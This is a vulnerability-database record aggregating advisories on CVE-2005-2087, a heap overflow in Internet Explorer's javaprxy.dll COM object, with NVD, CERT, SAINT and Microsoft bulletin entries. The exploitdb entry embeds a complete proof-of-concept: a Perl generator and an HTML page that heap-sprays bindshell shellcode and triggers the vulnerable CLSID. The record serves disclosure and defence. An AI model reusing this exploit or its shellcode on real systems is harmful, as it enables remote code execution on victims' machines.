Windows operating systems use the Component Object Model (COM) to allow various program components to be run within different applications. One such object, the JView Profiler (**Javaprxy.dll**), is a debugger interface for Microsoft Java Virtual Machine.
Problem
Internet Explorer is affected by a heap overflow vulnerability when the **Javaprxy.dll** COM object is instantiated, allow command execution by a malicious web page.
Exploit works if a vulnerable version of **javaprxy.dll** is present. A user must load the exploit page into Internet Explorer in order for exploitation to succeed.
Platforms
Windows
{"type": "saint", "published": "2006-06-05T00:00:00", "reporter": "SAINT Corporation", "bulletinFamily": "exploit", "id": "SAINT:75943BE21060649FB2CF38323F43E3C0", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-2087"]}, {"type": "saint", "idList": ["SAINT:29557D72491275F7C43A6A911AF0D54D", "SAINT:DAC6C91170670984B710DF599C918879"]}, {"type": "cert", "idList": ["VU:959049", "VU:939605"]}, {"type": "nessus", "idList": ["SMB_NT_MS05-037.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:9144"]}, {"type": "exploitdb", "idList": ["EDB-ID:1079"]}, {"type": "osvdb", "idList": ["OSVDB:17680"]}], "modified": "2019-05-29T17:19:47", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2019-05-29T17:19:47", "rev": 2}, "vulnersScore": 7.0}, "edition": 2, "viewCount": 2, "cvelist": ["CVE-2005-2087"], "references": [], "lastseen": "2019-05-29T17:19:47", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/ie_javaprxy", "modified": "2006-06-05T00:00:00", "title": "Internet Explorer Javaprxy.dll heap overflow", "description": "Added: 06/05/2006 \nCVE: [CVE-2005-2087](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2087>) \nBID: [14087](<http://www.securityfocus.com/bid/14087>) \nOSVDB: [17680](<http://www.osvdb.org/17680>) \n\n\n### Background\n\nWindows operating systems use the Component Object Model (COM) to allow various program components to be run within different applications. One such object, the JView Profiler (`**Javaprxy.dll**`), is a debugger interface for Microsoft Java Virtual Machine. \n\n### Problem\n\nInternet Explorer is affected by a heap overflow vulnerability when the `**Javaprxy.dll**` COM object is instantiated, allow command execution by a malicious web page. \n\n### Resolution\n\nApply the patch referenced in [Microsoft Security Bulletin 05-037](<http://www.microsoft.com/technet/security/Bulletin/MS05-037.mspx>). \n\n### References\n\n<http://www.kb.cert.org/vuls/id/939605> \n\n\n### Limitations\n\nExploit works if a vulnerable version of `**javaprxy.dll**` is present. A user must load the exploit page into Internet Explorer in order for exploitation to succeed. \n\n### Platforms\n\nWindows \n \n\n", "scheme": null}
{"cve": [{"lastseen": "2021-02-02T05:24:37", "description": "Internet Explorer 5.01 SP4 up to 6 on various Windows operating systems, including IE 6.0.2900.2180 on Windows XP, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a web page with embedded CLSIDs that reference certain COM objects that are not ActiveX controls, as demonstrated using the JVIEW Profiler (Javaprxy.dll). NOTE: the researcher says that the vendor could not reproduce this problem.", "edition": 4, "cvss3": {}, "published": "2005-07-05T04:00:00", "title": "CVE-2005-2087", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-2087"], "modified": "2018-10-12T21:36:00", "cpe": ["cpe:/a:microsoft:ie:6", "cpe:/a:microsoft:ie:6.0", "cpe:/a:microsoft:ie:5.1", "cpe:/a:microsoft:ie:5.5", "cpe:/a:microsoft:ie:5.2.3", "cpe:/a:microsoft:ie:6.0.2900.2180", "cpe:/a:microsoft:ie:5.01"], "id": "CVE-2005-2087", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2087", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:microsoft:ie:5.1:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:ie:5.5:preview:*:*:*:*:*:*", "cpe:2.3:a:microsoft:ie:5.5:sp1:*:*:*:*:*:*", "cpe:2.3:a:microsoft:ie:5.1:*:mac_os:*:*:*:*:*", "cpe:2.3:a:microsoft:ie:6:windows_server_2003_sp1:*:*:*:*:*:*", "cpe:2.3:a:microsoft:ie:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:ie:5.01:sp4:*:*:*:*:*:*", "cpe:2.3:a:microsoft:ie:5.5:sp2:*:*:*:*:*:*", "cpe:2.3:a:microsoft:ie:5.2.3:*:macintosh:*:*:*:*:*", "cpe:2.3:a:microsoft:ie:6.0.2900.2180:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:ie:5.5:*:*:*:*:*:*:*"]}], "saint": [{"lastseen": "2016-10-03T15:01:55", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-2087"], "description": "Added: 06/05/2006 \nCVE: [CVE-2005-2087](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2087>) \nBID: [14087](<http://www.securityfocus.com/bid/14087>) \nOSVDB: [17680](<http://www.osvdb.org/17680>) \n\n\n### Background\n\nWindows operating systems use the Component Object Model (COM) to allow various program components to be run within different applications. One such object, the JView Profiler (`**Javaprxy.dll**`), is a debugger interface for Microsoft Java Virtual Machine. \n\n### Problem\n\nInternet Explorer is affected by a heap overflow vulnerability when the `**Javaprxy.dll**` COM object is instantiated, allow command execution by a malicious web page. \n\n### Resolution\n\nApply the patch referenced in [Microsoft Security Bulletin 05-037](<http://www.microsoft.com/technet/security/Bulletin/MS05-037.mspx>). \n\n### References\n\n<http://www.kb.cert.org/vuls/id/939605> \n\n\n### Limitations\n\nExploit works if a vulnerable version of `**javaprxy.dll**` is present. A user must load the exploit page into Internet Explorer in order for exploitation to succeed. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2006-06-05T00:00:00", "published": "2006-06-05T00:00:00", "id": "SAINT:29557D72491275F7C43A6A911AF0D54D", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/ie_javaprxy", "type": "saint", "title": "Internet Explorer Javaprxy.dll heap overflow", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-06-04T23:19:34", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-2087"], "description": "Added: 06/05/2006 \nCVE: [CVE-2005-2087](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2087>) \nBID: [14087](<http://www.securityfocus.com/bid/14087>) \nOSVDB: [17680](<http://www.osvdb.org/17680>) \n\n\n### Background\n\nWindows operating systems use the Component Object Model (COM) to allow various program components to be run within different applications. One such object, the JView Profiler (`**Javaprxy.dll**`), is a debugger interface for Microsoft Java Virtual Machine. \n\n### Problem\n\nInternet Explorer is affected by a heap overflow vulnerability when the `**Javaprxy.dll**` COM object is instantiated, allow command execution by a malicious web page. \n\n### Resolution\n\nApply the patch referenced in [Microsoft Security Bulletin 05-037](<http://www.microsoft.com/technet/security/Bulletin/MS05-037.mspx>). \n\n### References\n\n<http://www.kb.cert.org/vuls/id/939605> \n\n\n### Limitations\n\nExploit works if a vulnerable version of `**javaprxy.dll**` is present. A user must load the exploit page into Internet Explorer in order for exploitation to succeed. \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2006-06-05T00:00:00", "published": "2006-06-05T00:00:00", "id": "SAINT:DAC6C91170670984B710DF599C918879", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/ie_javaprxy", "title": "Internet Explorer Javaprxy.dll heap overflow", "type": "saint", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:14", "bulletinFamily": "software", "cvelist": ["CVE-2005-2087"], "edition": 1, "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](http://www.microsoft.com/technet/security/advisory/903144.mspx)\nSecurity Tracker: 1014329\n[Secunia Advisory ID:15891](https://secuniaresearch.flexerasoftware.com/advisories/15891/)\nOther Advisory URL: http://www.niscc.gov.uk/niscc/docs/br-20050701-00536.html?lang=en\nOther Advisory URL: http://www.sec-consult.com/184.html\nOther Advisory URL: http://www.info-directory.info/Article882.html\nOther Advisory URL: http://www.us-cert.gov/cas/techalerts/TA05-193A.html\nMicrosoft Security Bulletin: MS05-037\nMicrosoft Knowledge Base Article: 903235\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-06/0360.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-07/0018.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-07/0036.html\nKeyword: SEC-CONSULT SA-20050629-0\nISS X-Force ID: 21193\n[CVE-2005-2087](https://vulners.com/cve/CVE-2005-2087)\nCERT VU: 939605\nBugtraq ID: 14087\n", "modified": "2005-06-29T04:46:47", "published": "2005-06-29T04:46:47", "href": "https://vulners.com/osvdb/OSVDB:17680", "id": "OSVDB:17680", "title": "Microsoft IE JVIEW javaprxy.dll Memory Manipulation Arbitrary Code Execution", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "cert": [{"lastseen": "2020-09-18T20:43:26", "bulletinFamily": "info", "cvelist": ["CVE-2005-2087"], "description": "### Overview \n\nThe JVIEW Profiler COM object contains an unspecified vulnerability, which may allow a remote attacker to execute arbitrary code on a vulnerable system.\n\n### Description \n\n**Microsoft COM**\n\n[Microsoft COM](<http://www.microsoft.com/com/default.mspx>) is a technology that allows programmers to create reusable software components that can be incorporated into applications to extend their functionality. Microsoft COM includes COM+, Distributed COM (DCOM), and ActiveX Controls. \n \n**ActiveX controls** \n \nActiveX controls are COM objects that are designed to be used in Internet Explorer. A web page can make use of an ActiveX control through the use of the `OBJECT` tag. \n \n**JVIEW Profiler** \n \nThe JVIEW Profiler is a COM object provided by `javaprxy.dll`, which is an interface to the debugger in the Microsoft Java Virtual Machine. \n \n**The Problem** \n \nInternet Explorer will attempt to instantiate any COM object that is referenced by a web page. COM objects that are not ActiveX controls may cause unexpected results, such as crashing Internet Explorer. The JVIEW Profiler COM object crashes in a way that can be exploited to execute arbitrary code on a vulnerable system. \n \n--- \n \n### Impact \n\nBy convincing a user to view a specially crafted HTML document (e.g., a web page or an HTML email message), an attacker could execute arbitrary code with the privileges of the user. The attacker could also cause IE (or the program using the WebBrowser control) to crash. \nProof of concept code is publicly available. \n \n--- \n \n### Solution \n\n**Apply An Update** \nApply the appropriate update, as specified in the [Microsoft Security Bulletin](<http://www.microsoft.com/technet/security/bulletin/ms05-037.mspx>). This update sets the \"kill bit\" for the JVIEW Profiler COM object. \n \n--- \n \n \nMicrosoft has listed several workarounds in the [Microsoft Security Bulletin](<http://www.microsoft.com/technet/security/bulletin/ms05-037.mspx>), including disabling ActiveX controls, disabling Active scripting, and unregistering `javaprxy.dll`. \n \n--- \n \n### Vendor Information\n\n939605\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Microsoft Corporation __ Affected\n\nNotified: June 30, 2005 Updated: July 02, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see the [Microsoft Security Advisory](<http://www.microsoft.com/technet/security/advisory/903144.mspx>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23939605 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://www.microsoft.com/technet/security/bulletin/ms05-037.mspx>\n * <http://www.microsoft.com/technet/security/advisory/903144.mspx>\n * <http://www.sec-consult.com/184.html>\n * <http://secunia.com/advisories/15891/>\n * <http://www.securitytracker.com/alerts/2005/Jun/1014329.html>\n * <http://www.osvdb.org/displayvuln.php?osvdb_id=17680>\n * <http://www.securityfocus.com/bid/14087>\n * <http://xforce.iss.net/xforce/xfdb/21193>\n * <http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33120>\n\n### Acknowledgements\n\nThis vulnerability was publicly reported by Bernhard Mueller.\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2005-2087](<http://web.nvd.nist.gov/vuln/detail/CVE-2005-2087>) \n---|--- \n**Severity Metric:** | 44.55 \n**Date Public:** | 2005-06-29 \n**Date First Published:** | 2005-07-02 \n**Date Last Updated: ** | 2005-07-12 17:24 UTC \n**Document Revision: ** | 28 \n", "modified": "2005-07-12T17:24:00", "published": "2005-07-02T00:00:00", "id": "VU:939605", "href": "https://www.kb.cert.org/vuls/id/939605", "type": "cert", "title": "JVIEW Profiler (javaprxy.dll) COM object contains an unspecified vulnerability", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-09-18T20:43:25", "bulletinFamily": "info", "cvelist": ["CVE-2005-1990", "CVE-2005-2087", "CVE-2005-2127", "CVE-2005-2831", "CVE-2006-1186", "CVE-2006-1303", "CVE-2006-3638"], "description": "### Overview \n\nMicrosoft Internet Explorer (IE) allows instantiation of COM objects not designed for use in the browser, which may allow a remote attacker to execute arbitrary code or crash IE.\n\n### Description \n\n**Microsoft COM**\n\n[Microsoft COM](<http://www.microsoft.com/com/default.mspx>) is a technology that allows programmers to create reusable software components that can be incorporated into applications to extend their functionality. Microsoft COM includes COM+, Distributed COM (DCOM), and ActiveX Controls. \n \n**ActiveX controls** \n \nActiveX controls are COM objects that have visual elements. ActiveX controls are traditionally designed to be used in Internet Explorer. A web page can make use of an ActiveX control in various ways, such as by referencing its Class Identifier (CLSID) in an HTML OBJECT tag. \n \n**The Problem** \n \nInternet Explorer will attempt to instantiate any COM object that is referenced by a web page. Certain COM objects that are not designed for use in Internet Explorer may cause unexpected results, such as executing arbitrary code or crashing the browser. \n \nExploit code for these vulnerabilities are publicly available. \n \n--- \n \n### Impact \n\nBy convincing a user to view a specially crafted HTML document (e.g., a web page, an HTML email message, or an email attachment), an attacker could execute arbitrary code with the privileges of the user. The attacker could also cause IE (or the program using the WebBrowser control) to crash. \n \n--- \n \n### Solution \n\n**Apply An Update** \nApply the appropriate update, as specified in Microsoft Security Bulletin [MS06-042](<http://www.microsoft.com/technet/security/Bulletin/MS06-042.mspx>). This update sets the \"kill bit\" for certain CLSID values of COM objects known to be vulnerable. The MS06-042 update is similar to [MS06-021](<http://www.microsoft.com/technet/security/Bulletin/MS06-021.mspx>)[](<http://www.microsoft.com/technet/security/bulletin/ms05-054.mspx>), [MS06-013](<http://www.microsoft.com/technet/security/Bulletin/MS06-013.mspx>), [MS05-054](<http://www.microsoft.com/technet/security/bulletin/ms05-054.mspx>), [MS05-037](<http://www.microsoft.com/technet/security/bulletin/ms05-037.mspx>), [MS05-038](<http://www.microsoft.com/technet/security/bulletin/ms05-038.mspx>), and [MS05-052](<http://www.microsoft.com/technet/security/bulletin/ms05-052.mspx>), but it includes additional COM objects. \n \n--- \n \n \nMicrosoft has listed several workarounds in the [Microsoft Security Bulletin](<http://www.microsoft.com/technet/security/bulletin/ms05-054.mspx>), including disabling ActiveX controls. \n \n--- \n \n### Vendor Information\n\n959049\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Microsoft Corporation __ Affected\n\nNotified: September 01, 2005 Updated: August 08, 2006 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease se Microsoft Security Bulletin [MS06-042](<http://www.microsoft.com/technet/security/Bulletin/MS06-042.mspx>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23959049 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://www.microsoft.com/technet/security/bulletin/MS05-037.mspx>\n * <http://www.microsoft.com/technet/security/bulletin/MS05-038.mspx>\n * <http://www.microsoft.com/technet/security/Bulletin/MS05-052.mspx>\n * <http://www.microsoft.com/technet/security/Bulletin/MS05-054.mspx>\n * <http://www.microsoft.com/technet/security/Bulletin/MS06-013.mspx>\n * <http://www.microsoft.com/technet/security/Bulletin/MS06-021.mspx>\n * <http://www.microsoft.com/technet/security/bulletin/ms06-042.mspx>\n * <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2087>\n * <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1990>\n * <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2127>\n * <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2831>\n * <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1186>\n * <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2006-1303>\n * <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3638>\n * <http://www.nsfocus.com/english/homepage/research/0502.htm>\n * <http://secunia.com/advisories/16373/>\n * <http://www.securityfocus.com/bid/14511>\n * <http://www.securiteam.com/windowsntfocus/5WP0B00GLC.html>\n * <http://www.osvdb.org/displayvuln.php?osvdb_id=18612>\n\n### Acknowledgements\n\nThanks to Microsoft for reporting this vulnerability.\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2005-1990](<http://web.nvd.nist.gov/vuln/detail/CVE-2005-1990>) \n---|--- \n**Severity Metric:** | 45.56 \n**Date Public:** | 2005-08-09 \n**Date First Published:** | 2005-08-09 \n**Date Last Updated: ** | 2006-08-09 22:06 UTC \n**Document Revision: ** | 38 \n", "modified": "2006-08-09T22:06:00", "published": "2005-08-09T00:00:00", "id": "VU:959049", "href": "https://www.kb.cert.org/vuls/id/959049", "type": "cert", "title": "Multiple COM objects cause memory corruption in Microsoft Internet Explorer", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-01-31T13:30:29", "description": "MS Internet Explorer (javaprxy.dll) COM Object Remote Exploit. CVE-2005-2087. Remote exploit for windows platform", "published": "2005-07-05T00:00:00", "type": "exploitdb", "title": "Microsoft Internet Explorer javaprxy.dll COM Object Remote Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-2087"], "modified": "2005-07-05T00:00:00", "id": "EDB-ID:1079", "href": "https://www.exploit-db.com/exploits/1079/", "sourceData": "<!--\r\n(update) frsirt updated the comments to reflect skylined's code + gpl. /str0ke\r\n\r\nPerl code is commented so people can test the vuln on their IE /str0ke\r\n\r\n#!/usr/bin/perl\r\n#\r\n######################################################\r\n# \r\n# Microsoft Internet Explorer \"javaprxy.dll\" COM Object Exploit -Unpatched-\r\n#\r\n# Proof of Concept by the FrSIRT < http://www.frsirt.com / team@frsirt.com >\r\n# Bindshell on port 28876 - Based on Berend-Jan Wever's IE exploit\r\n# 01 July 2005\r\n#\r\n# Description - http://www.frsirt.com/english/advisories/2005/0935\r\n# Workarounds - http://www.microsoft.com/technet/security/advisory/903144.mspx\r\n# sec-consult - http://www.sec-consult.com/184.html\r\n# \r\n# Solution :\r\n# Set Internet and Local intranet security zone settings to \"High\" or use\r\n# another browser until a patch is released.\r\n#\r\n# Tested on : \r\n# Internet Explorer 6 on Microsoft Windows XP SP2\r\n# Internet Explorer 6 on Microsoft Windows XP SP1\r\n#\r\n# Affected versions : \r\n# Internet Explorer 5.01 Service Pack 3 on Microsoft Windows 2000 Service Pack 3\r\n# Internet Explorer 5.01 Service Pack 4 on Microsoft Windows 2000 Service Pack 4\r\n# Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 3\r\n# Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 4\r\n# Internet Explorer 6 Service Pack 1 on Microsoft Windows XP Service Pack 1\r\n# Internet Explorer 6 for Microsoft Windows XP Service Pack 2\r\n# Internet Explorer 6 Service Pack 1 for Microsoft Windows XP 64-Bit SP1 (Itanium)\r\n# Internet Explorer 6 for Microsoft Windows Server 2003\r\n# Internet Explorer 6 for Microsoft Windows Server 2003 Service Pack 1\r\n# Internet Explorer 6 for Microsoft Windows Server 2003 for Itanium-based Systems\r\n# Internet Explorer 6 for Microsoft Windows Server 2003 with SP1 for Itanium\r\n# Internet Explorer 6 for Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium)\r\n# Internet Explorer 6 for Microsoft Windows Server 2003 x64 Edition\r\n# Internet Explorer 6 for Microsoft Windows XP Professional x64 Edition\r\n# Internet Explorer 5.5 Service Pack 2 on Microsoft Windows Millennium Edition\r\n# Internet Explorer 6 Service Pack 1 on Microsoft Windows 98\r\n# Internet Explorer 6 Service Pack 1 on Microsoft Windows 98 SE\r\n# Internet Explorer 6 Service Pack 1 on Microsoft Windows Millennium Edition \r\n# \r\n# Usage : perl iejavaprxyexploit.pl > mypage.html\r\n# \r\n######################################################\r\n#\r\n# This program is free software; you can redistribute it and/or modify it under\r\n# the terms of the GNU General Public License version 2, 1991 as published by\r\n# the Free Software Foundation.\r\n# \r\n# This program is distributed in the hope that it will be useful, but WITHOUT\r\n# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS\r\n# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more\r\n# details.\r\n# \r\n# A copy of the GNU General Public License can be found at:\r\n# http://www.gnu.org/licenses/gpl.html\r\n# or you can write to:\r\n# Free Software Foundation, Inc.\r\n# 59 Temple Place - Suite 330\r\n# Boston, MA 02111-1307\r\n# USA.\r\n#\r\n######################################################\r\n\r\n# header\r\nmy $header = \"<html><body>\\n<SCRIPT language=\\\"javascript\\\">\\n\";\r\n\r\n# Win32 bindshell (port 28876) - SkyLined\r\nmy $shellcode = \"shellcode = unescape(\\\"%u4343\\\"+\\\"%u4343\\\"+\\\"%u43eb\".\r\n\"%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea\".\r\n\"%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7\".\r\n\"%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b\".\r\n\"%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64\".\r\n\"%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c\".\r\n\"%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe\".\r\n\"%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0\".\r\n\"%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050\".\r\n\"%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6\".\r\n\"%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650\".\r\n\"%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa\".\r\n\"%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656\".\r\n\"%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1\".\r\n\"%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353\".\r\n\"%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353\".\r\n\"%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe\".\r\n\"%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff\".\r\n\"%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb\\\");\\n\";\r\n\r\n# Memory \r\nmy $code = \"bigblock = unescape(\\\"%u0D0D%u0D0D\\\");\\n\".\r\n\"headersize = 20;\\n\".\r\n\"slackspace = headersize+shellcode.length\\n\".\r\n\"while (bigblock.length<slackspace) bigblock+=bigblock;\\n\".\r\n\"fillblock = bigblock.substring(0, slackspace);\\n\".\r\n\"block = bigblock.substring(0, bigblock.length-slackspace);\\n\".\r\n\"while(block.length+slackspace<0x40000) block = block+block+fillblock;\\n\".\r\n\"memory = new Array();\\n\".\r\n\"for (i=0;i<750;i++) memory[i] = block + shellcode;\\n\".\r\n\"</SCRIPT>\\n\";\r\n\r\n# javaprxy.dll \r\nmy $clsid = '03D9F3F2-B0E3-11D2-B081-006008039BF0'; \r\n\r\n# footer\r\nmy $footer = \"<object classid=\\\"CLSID:\".$clsid.\"\\\"></object>\\n\".\r\n\"Microsoft Internet Explorer javaprxy.dll COM Object Remote Exploit\\n\".\r\n\"by the FrSIRT < http://www.frsirt.com >\\n\".\r\n\"Solution - http://www.frsirt.com/english/advisories/2005/0935\".\r\n\"</body><script>location.reload();</script></html>\";\r\n\r\n# print \"Content-Type: text/html;\\r\\n\\r\\n\"; # if you are in cgi-bin\r\nprint \"$header $shellcode $code $footer\"; \r\n\r\n-->\r\n\r\n<html><body>\r\n<SCRIPT language=\"javascript\">\r\n shellcode = unescape(\"%u4343\"+\"%u4343\"+\"%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb\");\r\n bigblock = unescape(\"%u0D0D%u0D0D\");\r\nheadersize = 20;\r\nslackspace = headersize+shellcode.length\r\nwhile (bigblock.length<slackspace) bigblock+=bigblock;\r\nfillblock = bigblock.substring(0, slackspace);\r\nblock = bigblock.substring(0, bigblock.length-slackspace);\r\nwhile(block.length+slackspace<0x40000) block = block+block+fillblock;\r\nmemory = new Array();\r\nfor (i=0;i<750;i++) memory[i] = block + shellcode;\r\n</SCRIPT>\r\n <object classid=\"CLSID:03D9F3F2-B0E3-11D2-B081-006008039BF0\"></object>\r\nMicrosoft Internet Explorer javaprxy.dll COM Object Remote Exploit\r\nby the FrSIRT < http://www.frsirt.com >\r\nSolution - http://www.frsirt.com/english/advisories/2005/0935</body><script>location.reload();</script></html>\n\n# milw0rm.com [2005-07-05]\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/1079/"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:13", "bulletinFamily": "software", "cvelist": ["CVE-2005-2087"], "description": "Microsoft Security Bulletin MS05-037\r\nVulnerability in JView Profiler Could Allow Remote Code Execution (903235)\r\n\r\nIssued: July 12, 2005\r\nVersion: 1.0\r\nSummary\r\n\r\nWho should read this document: Customers who use Microsoft Windows\r\n\r\nImpact of Vulnerability: Remote Code Execution\r\n\r\nMaximum Severity Rating: Critical\r\n\r\nRecommendation: Customers should apply the update immediately.\r\n\r\nSecurity Update Replacement: None\r\n\r\nCaveats: None\r\n\r\nTested Software and Security Update Download Locations:\r\n\r\nAffected Software:\r\n\u2022\t\r\n\r\nMicrosoft Windows 2000 Service Pack 4\r\n\u2022\t\r\n\r\nMicrosoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2\r\n\u2022\t\r\n\r\nMicrosoft Windows XP Professional x64 Edition\r\n\u2022\t\r\n\r\nMicrosoft Windows Server 2003\r\n\u2022\t\r\n\r\nMicrosoft Windows Server 2003 Service Pack 1\r\n\u2022\t\r\n\r\nMicrosoft Windows Server 2003 for Itanium-based Systems\r\n\u2022\t\r\n\r\nMicrosoft Windows Server 2003 